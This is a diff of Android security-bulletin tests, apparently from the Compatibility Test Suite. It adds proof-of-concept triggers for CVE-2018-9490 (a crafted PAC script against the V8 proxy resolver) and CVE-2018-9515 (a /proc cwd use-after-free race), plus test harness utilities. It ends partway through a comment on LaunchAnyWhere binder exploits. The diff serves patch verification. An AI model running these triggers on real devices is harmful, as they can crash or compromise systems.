copy to hostsidetests/securitybulletin/securityPatch/CVE-2018-9490/Android.mk
index 5e53ee5..691d3f3
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2062/Android.mk
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9490/Android.mk
@@ -15,19 +15,26 @@
LOCAL_PATH := $(call my-dir)
include $(CLEAR_VARS)
-LOCAL_MODULE := CVE-2016-2062
-LOCAL_SRC_FILES := poc.c
+LOCAL_MODULE := CVE-2018-9490
+LOCAL_SRC_FILES := poc.cpp
LOCAL_MULTILIB := both
LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
-LOCAL_SHARED_LIBRARIES := liblog
+LOCAL_C_INCLUDES:= \
+ $(TOP)/external/chromium-libpac/src \
+ $(TOP)/external/v8 \
+
+LOCAL_SHARED_LIBRARIES := \
+ libpac \
+ libutils \
+ libandroid_runtime \
# Tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts sts vts
+LOCAL_COMPATIBILITY_SUITE := cts sts
LOCAL_CTS_TEST_PACKAGE := android.security.cts
LOCAL_ARM_MODE := arm
-LOCAL_CFLAGS += -Wall -Werror
+LOCAL_CPPFLAGS = -Wall -Werror
include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9490/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9490/poc.cpp
new file mode 100644
index 0000000..242d2af
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9490/poc.cpp
@@ -0,0 +1,67 @@
+/*
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#ifndef _GNU_SOURCE
+#define _GNU_SOURCE
+#endif
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <iostream>
+#include <utils/String8.h>
+#include <utils/String16.h>
+#include <proxy_resolver_v8.h>
+#include <proxy_resolver_js_bindings.h>
+
+android::String16 url ("");
+android::String16 host ("");
+android::String16 script(
+ "function FindProxyForURL(url, host){\n" \
+ " alert(\"enter\");\n" \
+ " let arr = [];\n" \
+ " arr[1000] = 0x1234;\n" \
+ "\n" \
+ " arr.__defineGetter__(256, function () {\n" \
+ " delete arr[256];\n" \
+ " arr.unshift(1.1);\n" \
+ " arr.length = 0;\n" \
+ " });\n" \
+ "\n" \
+ " Object.entries(arr).toString();\n" \
+ " alert(JSON.stringify(entries));\n" \
+ "\n" \
+ " return 0;\n" \
+ "}\n");
+
+class MyErrorListener : public net::ProxyErrorListener {
+ public:
+ virtual void AlertMessage(android::String16) {
+ }
+
+ virtual void ErrorMessage(android::String16) {
+ }
+};
+
+int main(void) {
+
+ net::ProxyResolverJSBindings *bindings = net::ProxyResolverJSBindings::CreateDefault();
+ MyErrorListener errorListener;
+ net::ProxyResolverV8 resolver(bindings, &errorListener);
+ android::String16 results;
+
+ resolver.SetPacScript(script);
+ resolver.GetProxyForURL(url, host, &results);
+ return 0;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2062/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9515/Android.mk
old mode 100755
new mode 100644
similarity index 78%
copy from hostsidetests/securitybulletin/securityPatch/CVE-2016-2062/Android.mk
copy to hostsidetests/securitybulletin/securityPatch/CVE-2018-9515/Android.mk
index 5e53ee5..3c8d79c
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2062/Android.mk
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9515/Android.mk
@@ -4,7 +4,7 @@
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
-# http://www.apache.org/licenses/LICENSE-2.0
+# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
@@ -15,19 +15,16 @@
LOCAL_PATH := $(call my-dir)
include $(CLEAR_VARS)
-LOCAL_MODULE := CVE-2016-2062
+LOCAL_MODULE := CVE-2018-9515
LOCAL_SRC_FILES := poc.c
LOCAL_MULTILIB := both
LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
-LOCAL_SHARED_LIBRARIES := liblog
-
-# Tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts sts vts
+LOCAL_COMPATIBILITY_SUITE := cts vts sts
LOCAL_CTS_TEST_PACKAGE := android.security.cts
LOCAL_ARM_MODE := arm
-LOCAL_CFLAGS += -Wall -Werror
+LOCAL_CFLAGS := -Wall -Werror
include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9515/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9515/poc.c
new file mode 100644
index 0000000..a89d596
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9515/poc.c
@@ -0,0 +1,75 @@
+#define _GNU_SOURCE
+#include <pthread.h>
+#include <err.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <string.h>
+#include <time.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/syscall.h>
+#include "../includes/common.h"
+
+pid_t looper_pid;
+
+void *uaf_worker(__attribute__ ((unused)) void *unused) {
+ char cwd_path[100];
+ sprintf(cwd_path, "/proc/self/task/%d/cwd", (int)looper_pid);
+
+ time_t timer = start_timer();
+ while (timer_active(timer)) {
+ char symlink_target[1000];
+ int len = readlink(cwd_path, symlink_target, sizeof(symlink_target)-1);
+ if (len > 0) {
+ symlink_target[len] = 0;
+ }
+ }
+
+ return NULL;
+}
+
+void *chaos_worker(__attribute__ ((unused)) void *unused) {
+ if (chdir("/sdcard/Android/data/CVE-2018-9515"))
+ err(1, "chdir");
+ rmdir("subdir");
+
+ time_t timer = start_timer();
+ while (timer_active(timer)) {
+ if (mkdir("subdir", 0777))
+ err(1, "mkdir");
+ if (chdir("subdir"))
+ err(1, "chdir");
+ if (rmdir("../subdir"))
+ err(1, "rmdir");
+ if (chdir(".."))
+ err(1, "chdir");
+ }
+
+ return NULL;
+}
+
+int main(void) {
+ looper_pid = syscall(__NR_gettid);
+
+ pthread_t thread;
+ if (pthread_create(&thread, NULL, uaf_worker, NULL))
+ errx(1, "pthread_create failed");
+
+ pthread_t thread2;
+ if (pthread_create(&thread2, NULL, chaos_worker, NULL))
+ errx(1, "pthread_create failed");
+
+ char my_dir_name[100];
+ sprintf(my_dir_name, "/sdcard/Android/data/CVE-2018-9515/foobar");
+ rmdir(my_dir_name);
+
+ time_t timer = start_timer();
+ while (timer_active(timer)) {
+ if (mkdir(my_dir_name, 0777))
+ err(1, "looper: mkdir");
+ if (rmdir(my_dir_name))
+ err(1, "looper: rmdir");
+ }
+
+ return 0;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/avcdec/Android.mk b/hostsidetests/securitybulletin/securityPatch/avcdec/Android.mk
new file mode 100644
index 0000000..033a20d
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/avcdec/Android.mk
@@ -0,0 +1,40 @@
+# Copyright (C) 2018 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#=========================================================================
+# NOTE: This module uses the libavc's testbench from external folder
+# without creating a copy of the testbench locally. Hence LOCAL_SRC_FILES
+# is pointed to external folder.
+# This module is dependent on external/libavc/test
+#=========================================================================
+LOCAL_PATH := $(call my-dir)
+include $(CLEAR_VARS)
+
+LOCAL_MODULE := testavcdec
+LOCAL_SRC_FILES := ../../../../../external/libavc/test/decoder/main.c
+LOCAL_MULTILIB := 32
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_C_INCLUDES := external/libavc/common
+LOCAL_C_INCLUDES += external/libavc/decoder
+LOCAL_SHARED_LIBRARIES := liblog
+LOCAL_SHARED_LIBRARIES += libstagefright_soft_avcdec
+LOCAL_STATIC_LIBRARIES := libavcdec
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts sts vts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror
+LOCAL_CFLAGS += -DPROFILE_ENABLE -fPIC -DMD5_DISABLE
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/hevcdec/Android.mk b/hostsidetests/securitybulletin/securityPatch/hevcdec/Android.mk
new file mode 100644
index 0000000..ad66c14
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/hevcdec/Android.mk
@@ -0,0 +1,42 @@
+# Copyright (C) 2018 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+#=========================================================================
+# NOTE: This module uses the libhevc's testbench from external folder
+# without creating a copy of the testbench locally. Hence LOCAL_SRC_FILES
+# is pointed to external folder.
+# This module is dependent on external/libhevc/test
+#=========================================================================
+
+LOCAL_PATH := $(call my-dir)
+include $(CLEAR_VARS)
+
+LOCAL_MODULE := testhevcdec
+LOCAL_SRC_FILES := ../../../../../external/libhevc/test/decoder/main.c
+LOCAL_MULTILIB := 32
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_C_INCLUDES := external/libhevc/common
+LOCAL_C_INCLUDES += external/libhevc/decoder
+LOCAL_SHARED_LIBRARIES := liblog
+LOCAL_SHARED_LIBRARIES += libstagefright_soft_hevcdec
+LOCAL_STATIC_LIBRARIES := libhevcdec
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts sts vts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror
+LOCAL_CFLAGS += -DPROFILE_ENABLE -fPIC -DMD5_DISABLE
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_08.java b/hostsidetests/securitybulletin/securityPatch/includes/common.h
similarity index 62%
copy from hostsidetests/securitybulletin/src/android/security/cts/Poc16_08.java
copy to hostsidetests/securitybulletin/securityPatch/includes/common.h
index 5ed4c22..6800dc9 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_08.java
+++ b/hostsidetests/securitybulletin/securityPatch/includes/common.h
@@ -14,19 +14,24 @@
* limitations under the License.
*/
-package android.security.cts;
+#ifndef COMMON_H
+#define COMMON_H
-import android.platform.test.annotations.SecurityTest;
+#include <time.h>
+#define MAX_TEST_DURATION 300
-@SecurityTest
-public class Poc16_08 extends SecurityTestCase {
- /**
- * b/28026365
- */
- @SecurityTest
- public void testPocCVE_2016_2504() throws Exception {
- if (containsDriver(getDevice(), "/dev/kgsl-3d0")) {
- AdbUtils.runPoc("CVE-2016-2504", getDevice(), 60);
- }
- }
+// exit status code
+#define EXIT_VULNERABLE 113
+
+time_t start_timer(void);
+int timer_active(time_t timer_started);
+
+time_t start_timer(){
+ return time(NULL);
}
+
+int timer_active(time_t timer_started){
+ return time(NULL) < (timer_started + MAX_TEST_DURATION);
+}
+
+#endif /* COMMON_H */
diff --git a/hostsidetests/securitybulletin/securityPatch/mpeg2dec/Android.mk b/hostsidetests/securitybulletin/securityPatch/mpeg2dec/Android.mk
new file mode 100644
index 0000000..5709775
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/mpeg2dec/Android.mk
@@ -0,0 +1,42 @@
+# Copyright (C) 2018 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+#=========================================================================
+# NOTE: This module uses the libmpeg2's testbench from external folder
+# without creating a copy of the testbench locally. Hence LOCAL_SRC_FILES
+# is pointed to external folder.
+# This module is dependent on external/libmpeg2/test
+#=========================================================================
+
+LOCAL_PATH := $(call my-dir)
+include $(CLEAR_VARS)
+
+LOCAL_MODULE := testmpeg2dec
+LOCAL_SRC_FILES := ../../../../../external/libmpeg2/test/decoder/main.c
+LOCAL_MULTILIB := 32
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_C_INCLUDES := external/libmpeg2/common
+LOCAL_C_INCLUDES += external/libmpeg2/decoder
+LOCAL_SHARED_LIBRARIES := liblog
+LOCAL_SHARED_LIBRARIES += libstagefright_soft_mpeg2dec
+LOCAL_STATIC_LIBRARIES := libmpeg2dec
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts sts vts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror
+LOCAL_CFLAGS += -DPROFILE_ENABLE -fPIC -DMD5_DISABLE
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java b/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java
index 5ac0f87..f834c38 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java
@@ -20,19 +20,20 @@
import com.android.tradefed.device.CollectingOutputReceiver;
import com.android.tradefed.device.DeviceNotAvailableException;
import com.android.tradefed.device.ITestDevice;
-import com.android.tradefed.testtype.DeviceTestCase;
import com.android.tradefed.log.LogUtil.CLog;
-import android.platform.test.annotations.RootPermissionTest;
-
import java.io.BufferedOutputStream;
import java.io.File;
import java.io.FileOutputStream;
-import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
-import java.util.Scanner;
import java.util.concurrent.TimeUnit;
+import java.util.Scanner;
+
+import java.util.regex.Pattern;
+import java.lang.Thread;
+import static org.junit.Assert.*;
+import junit.framework.Assert;
public class AdbUtils {
@@ -49,7 +50,7 @@
/**
* Pushes and runs a binary to the selected device
*
- * @param pathToPoc a string path to poc from the /res folder
+ * @param pocName name of the poc binary
* @param device device to be ran on
* @return the console output from the binary
*/
@@ -61,15 +62,35 @@
/**
* Pushes and runs a binary to the selected device
*
- * @param pocName a string path to poc from the /res folder
+ * @param pocName name of the poc binary
* @param device device to be ran on
* @param timeout time to wait for output in seconds
* @return the console output from the binary
*/
public static String runPoc(String pocName, ITestDevice device, int timeout) throws Exception {
+ return runPoc(pocName, device, timeout, null);
+ }
+
+ /**
+ * Pushes and runs a binary to the selected device
+ *
+ * @param pocName name of the poc binary
+ * @param device device to be ran on
+ * @param timeout time to wait for output in seconds
+ * @param arguments the input arguments for the poc
+ * @return the console output from the binary
+ */
+ public static String runPoc(String pocName, ITestDevice device, int timeout, String arguments)
+ throws Exception {
device.executeShellCommand("chmod +x /data/local/tmp/" + pocName);
CollectingOutputReceiver receiver = new CollectingOutputReceiver();
- device.executeShellCommand("/data/local/tmp/" + pocName, receiver, timeout, TimeUnit.SECONDS, 0);
+ if (arguments != null) {
+ device.executeShellCommand("/data/local/tmp/" + pocName + " " + arguments, receiver,
+ timeout, TimeUnit.SECONDS, 0);
+ } else {
+ device.executeShellCommand("/data/local/tmp/" + pocName, receiver, timeout,
+ TimeUnit.SECONDS, 0);
+ }
String output = receiver.getOutput();
return output;
}
@@ -77,16 +98,35 @@
/**
* Pushes and runs a binary to the selected device and ignores any of its output.
*
- * @param pocName a string path to poc from the /res folder
+ * @param pocName name of the poc binary
* @param device device to be ran on
* @param timeout time to wait for output in seconds
*/
public static void runPocNoOutput(String pocName, ITestDevice device, int timeout)
throws Exception {
+ runPocNoOutput(pocName, device, timeout, null);
+ }
+
+ /**
+ * Pushes and runs a binary with arguments to the selected device and
+ * ignores any of its output.
+ *
+ * @param pocName name of the poc binary
+ * @param device device to be ran on
+ * @param timeout time to wait for output in seconds
+ * @param arguments input arguments for the poc
+ */
+ public static void runPocNoOutput(String pocName, ITestDevice device, int timeout,
+ String arguments) throws Exception {
device.executeShellCommand("chmod +x /data/local/tmp/" + pocName);
NullOutputReceiver receiver = new NullOutputReceiver();
- device.executeShellCommand("/data/local/tmp/" + pocName, receiver, timeout,
- TimeUnit.SECONDS, 0);
+ if (arguments != null) {
+ device.executeShellCommand("/data/local/tmp/" + pocName + " " + arguments, receiver,
+ timeout, TimeUnit.SECONDS, 0);
+ } else {
+ device.executeShellCommand("/data/local/tmp/" + pocName, receiver, timeout,
+ TimeUnit.SECONDS, 0);
+ }
}
/**
@@ -203,28 +243,91 @@
* @param device device to be ran on
* @param timeout time to wait for output in seconds
*/
+ @Deprecated
public static boolean runPocCheckExitCode(String pocName, ITestDevice device,
int timeout) throws Exception {
- device.executeShellCommand("chmod +x /data/local/tmp/" + pocName);
- CollectingOutputReceiver receiver = new CollectingOutputReceiver();
- device.executeShellCommand("/data/local/tmp/" + pocName + " > /dev/null 2>&1; echo $?",
- receiver, timeout, TimeUnit.SECONDS, 0);
-
- String returnStr = null;
- int returnNum = 0;
-
- try{
- returnStr = receiver.getOutput().replaceAll("[^0-9]", "");
- }catch(NullPointerException e){
- return false;
- }
- try{
- returnNum = Integer.parseInt(returnStr);
- }catch(NumberFormatException e){
- return false;
- }
//Refer to go/asdl-sts-guide Test section for knowing the significance of 113 code
- return returnNum == 113;
+ return runPocGetExitStatus(pocName, device, timeout) == 113;
+ }
+
+ /**
+ * Pushes and runs a binary to the device and returns the exit status.
+ * @param pocName a string path to poc from the /res folder
+ * @param device device to be ran on
+ * @param timeout time to wait for output in seconds
+
+ */
+ public static int runPocGetExitStatus(String pocName, ITestDevice device, int timeout)
+ throws Exception {
+ device.executeShellCommand("chmod +x /data/local/tmp/" + pocName);
+ CollectingOutputReceiver receiver = new CollectingOutputReceiver();
+ device.executeShellCommand("/data/local/tmp/" + pocName + " > /dev/null 2>&1; echo $?",
+ receiver, timeout, TimeUnit.SECONDS, 0);
+
+ String exitStatus = receiver.getOutput().replaceAll("[^0-9]", "");
+ return Integer.parseInt(exitStatus);
+ }
+
+ /**
+ * Pushes and runs a binary and asserts that the exit status isn't 113: vulnerable.
+ * @param pocName a string path to poc from the /res folder
+ * @param device device to be ran on
+ * @param timeout time to wait for output in seconds
+ */
+ public static void runPocAssertExitStatusNotVulnerable(
+ String pocName, ITestDevice device, int timeout) throws Exception {
+ assertTrue("PoC returned exit status 113: vulnerable",
+ runPocGetExitStatus(pocName, device, timeout) != 113);
+ }
+
+ /**
+ * Executes a given poc within a given timeout. Returns error if the
+ * given poc doesnt complete its execution within timeout. It also deletes
+ * the list of files provided.
+ *
+ * @param runner the thread which will be run
+ * @param timeout the timeout within which the thread's execution should
+ * complete
+ * @param device device to be ran on
+ * @param inputFiles list of files to be deleted
+ */
+ public static void runWithTimeoutDeleteFiles(Runnable runner, int timeout, ITestDevice device,
+ String[] inputFiles) throws Exception {
+ Thread t = new Thread(runner);
+ t.start();
+ boolean test_failed = false;
+ try {
+ t.join(timeout);
+ } catch (InterruptedException e) {
+ test_failed = true;
+ } finally {
+ if (inputFiles != null) {
+ for (int i = 0; i < inputFiles.length; i++) {
+ AdbUtils.runCommandLine("rm /data/local/tmp/" + inputFiles[i], device);
+ }
+ }
+ if (test_failed == true) {
+ Assert.fail("PoC was interrupted");
+ }
+ }
+ if (t.isAlive()) {
+ Assert.fail("PoC not completed within timeout of " + timeout + " ms");
+ }
+ }
+
+ /**
+ * Raises assert exception upon crash/error occurence
+ *
+ * @param crashPatternList array of crash log patterns to be checked for
+ * @param logcat String to be parsed
+ */
+ public static void checkCrash(String crashPatternList[], String logcat)
+ throws Exception {
+ for (int i = 0; i < crashPatternList.length; i++) {
+ assertFalse("Crash log pattern found!",
+ Pattern.compile(crashPatternList[i],
+ Pattern.MULTILINE).matcher(logcat).find());
+ }
}
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/HostsideOomCatcher.java b/hostsidetests/securitybulletin/src/android/security/cts/HostsideOomCatcher.java
new file mode 100644
index 0000000..cd39c56
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/HostsideOomCatcher.java
@@ -0,0 +1,230 @@
+/*
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import com.android.tradefed.device.CollectingOutputReceiver;
+import com.android.tradefed.device.DeviceNotAvailableException;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceTestCase;
+import com.android.tradefed.device.BackgroundDeviceAction;
+
+import android.platform.test.annotations.RootPermissionTest;
+
+import java.io.BufferedOutputStream;
+import java.io.File;
+import java.io.FileOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.util.Scanner;
+import java.util.regex.Pattern;
+import java.util.regex.Matcher;
+import java.util.Map;
+import java.util.HashMap;
+import java.util.concurrent.ConcurrentHashMap;
+import com.android.ddmlib.MultiLineReceiver;
+import com.android.ddmlib.Log;
+import com.android.ddmlib.TimeoutException;
+import java.lang.ref.WeakReference;
+
+/**
+ * A utility to monitor the device lowmemory state and reboot when low. Without this, tests that
+ * cause an OOM can sometimes cause ADB to become unresponsive indefinitely. Usage is to create an
+ * instance per instance of SecurityTestCase and call start() and stop() matching to
+ * SecurityTestCase setup() and teardown().
+ */
+public class HostsideOomCatcher {
+
+ private static final String LOG_TAG = "HostsideOomCatcher";
+
+ private static final long LOW_MEMORY_DEVICE_THRESHOLD_KB = 1024 * 1024; // 1GB
+ private static Map<String, WeakReference<BackgroundDeviceAction>> oomCatchers =
+ new ConcurrentHashMap<>();
+ private static Map<String, Long> totalMemories = new ConcurrentHashMap<>();
+
+ private boolean isLowMemoryDevice = false;
+
+ private SecurityTestCase context;
+
+ /**
+ * test behavior when oom is detected.
+ */
+ public enum OomBehavior {
+ FAIL_AND_LOG, // normal behavior
+ PASS_AND_LOG, // skip tests that oom low memory devices
+ FAIL_NO_LOG, // tests that check for oom
+ }
+ private OomBehavior oomBehavior = OomBehavior.FAIL_AND_LOG; // accessed across threads
+ private boolean oomDetected = false; // accessed across threads
+
+ public HostsideOomCatcher(SecurityTestCase context) {
+ this.context = context;
+ }
+
+ /**
+ * Utility to get the device memory total by reading /proc/meminfo and returning MemTotal
+ */
+ private static long getMemTotal(ITestDevice device) throws DeviceNotAvailableException {
+ String memInfo = device.executeShellCommand("cat /proc/meminfo");
+ Pattern pattern = Pattern.compile("MemTotal:\\s*(.*?)\\s*[kK][bB]");
+ Matcher matcher = pattern.matcher(memInfo);
+ if (matcher.find()) {
+ return Long.parseLong(matcher.group(1));
+ } else {
+ throw new RuntimeException("Could not get device memory total");
+ }
+ }
+
+ /**
+ * Start the hostside oom catcher thread for the test.
+ * Match this call to SecurityTestCase.setup().
+ */
+ public synchronized void start() throws Exception {
+ // cache device TotalMem to avoid and adb shell for every test.
+ Long totalMemory = totalMemories.get(getDevice().getSerialNumber());
+ if (totalMemory == null) {
+ totalMemory = getMemTotal(getDevice());
+ totalMemories.put(getDevice().getSerialNumber(), totalMemory);
+ }
+ isLowMemoryDevice = totalMemory < LOW_MEMORY_DEVICE_THRESHOLD_KB;
+
+ // reset test oom behavior
+ // Low memory devices should skip (pass) tests when OOMing and log so that the
+ // high-memory-test flag can be added. Normal devices should fail tests that OOM so that
+ // they'll be ran again with --retry. If the test OOMs because previous tests used the
+ // memory, it will likely pass on a second try.
+ if (isLowMemoryDevice) {
+ oomBehavior = OomBehavior.PASS_AND_LOG;
+ } else {
+ oomBehavior = OomBehavior.FAIL_AND_LOG;
+ }
+ oomDetected = false;
+
+ // Cache OOM detection in separate persistent threads for each device.
+ WeakReference<BackgroundDeviceAction> reference =
+ oomCatchers.get(getDevice().getSerialNumber());
+ BackgroundDeviceAction oomCatcher = null;
+ if (reference != null) {
+ oomCatcher = reference.get();
+ }
+ if (oomCatcher == null || !oomCatcher.isAlive() || oomCatcher.isCancelled()) {
+ AdbUtils.runCommandLine("am start com.android.cts.oomcatcher/.OomCatcher", getDevice());
+
+ oomCatcher = new BackgroundDeviceAction(
+ "logcat -c && logcat OomCatcher:V *:S",
+ "Oom Catcher background thread",
+ getDevice(), new OomReceiver(getDevice()), 0);
+
+ oomCatchers.put(getDevice().getSerialNumber(), new WeakReference<>(oomCatcher));
+ oomCatcher.start();
+ }
+ }
+
+ /**
+ * Stop the hostside oom catcher thread.
+ * Match this call to SecurityTestCase.setup().
+ */
+ public static void stop(String serial) {
+ WeakReference<BackgroundDeviceAction> reference = oomCatchers.get(serial);
+ if (reference != null) {
+ BackgroundDeviceAction oomCatcher = reference.get();
+ if (oomCatcher != null) {
+ oomCatcher.cancel();
+ }
+ }
+ }
+
+ /**
+ * Check every test teardown to see if the device oomed during the test.
+ */
+ public synchronized boolean isOomDetected() {
+ return oomDetected;
+ }
+
+ /**
+ * Return the current test behavior for when oom is detected.
+ */
+ public synchronized OomBehavior getOomBehavior() {
+ return oomBehavior;
+ }
+
+ /**
+ * Flag meaning the test will likely fail on devices with low memory.
+ */
+ public synchronized void setHighMemoryTest() {
+ if (isLowMemoryDevice) {
+ oomBehavior = OomBehavior.PASS_AND_LOG;
+ } else {
+ oomBehavior = OomBehavior.FAIL_AND_LOG;
+ }
+ }
+
+ /**
+ * Flag meaning the test uses the OOM catcher to fail the test because the test vulnerability
+ * intentionally OOMs the device.
+ */
+ public synchronized void setOomTest() {
+ oomBehavior = OomBehavior.FAIL_NO_LOG;
+ }
+
+ private ITestDevice getDevice() {
+ return context.getDevice();
+ }
+
+ /**
+ * Read through logcat to find when the OomCatcher app reports low memory. Once detected, reboot
+ * the device to prevent a soft reset with the possiblity of ADB becomming unresponsive.
+ */
+ class OomReceiver extends MultiLineReceiver {
+
+ private ITestDevice device = null;
+ private boolean isCancelled = false;
+
+ public OomReceiver(ITestDevice device) {
+ this.device = device;
+ }
+
+ @Override
+ public void processNewLines(String[] lines) {
+ for (String line : lines) {
+ if (Pattern.matches(".*Low memory.*", line)) {
+ // low memory detected, reboot device to clear memory and pass test
+ isCancelled = true;
+ Log.logAndDisplay(Log.LogLevel.INFO, LOG_TAG,
+ "lowmemorykiller detected; rebooting device.");
+ synchronized (HostsideOomCatcher.this) { // synchronized for oomDetected
+ oomDetected = true;
+ }
+ try {
+ device.nonBlockingReboot();
+ device.waitForDeviceOnline(60 * 2 * 1000); // 2 minutes
+ context.updateKernelStartTime();
+ } catch (Exception e) {
+ Log.e(LOG_TAG, e.toString());
+ }
+ return; // we don't need to process remaining lines in the array
+ }
+ }
+ }
+
+ @Override
+ public boolean isCancelled() {
+ return isCancelled;
+ }
+ }
+}
+
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/LaunchSomeWhere.java b/hostsidetests/securitybulletin/src/android/security/cts/LaunchSomeWhere.java
new file mode 100644
index 0000000..3a61311
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/LaunchSomeWhere.java
@@ -0,0 +1,93 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import com.android.tradefed.device.ITestDevice;
+
+/*
+ * Adding Tests:
+ * We are testing a series of exploits that all take advantage of binder in the
+ * same way, using a malformed parcel to get system permission, with the only
+ * difference being the details of how we create the malformed parcel. In order
+ * to take advantage of these similarities (among other reasons) we share code
+ * between these exploits with an app that only requires two things to run a new
+ * version of this exploit: a class implementing IGenerateMalformedParcel and an
+ * intent telling the app which version of the exploit to run.
+ *
+ * When you recieve a new LaunchAnyWhere exploit it will likely be in the form
+ * of an app that can perform a number of actions such as creating a new pin
+ * or installing an app without recieving the appropriate permissions. However,
